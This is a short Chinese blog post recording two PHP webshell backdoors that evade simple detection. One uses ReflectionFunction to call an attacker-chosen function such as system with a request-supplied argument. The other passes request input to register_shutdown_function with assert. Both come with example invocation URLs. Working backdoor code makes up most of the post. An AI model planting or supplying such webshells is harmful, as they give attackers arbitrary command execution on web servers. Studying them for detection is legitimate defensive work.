关于PHP反射性后门

在土司上看到别人利用java反射类来写了关于webshell的方面的,自己也没尝试去学习过关于java方面的知识

稍微看了下关于PHP的反射方面的知识,先做个记录吧

test.php?m=system&c=ipconfig

<?php
  $func = new ReflectionFunction($_GET[m]);
  echo $func->invokeArgs(array($_GET[c]));
?>
test.php?e=assert&pass=phpinfo();

<?php
  $e = $_REQUEST['e'];
  register_shutdown_function($e, $_REQUEST['pass']);
?>
posted @ 2020-04-10 22:04  zpchcbd  阅读(164)  评论(0编辑  收藏  举报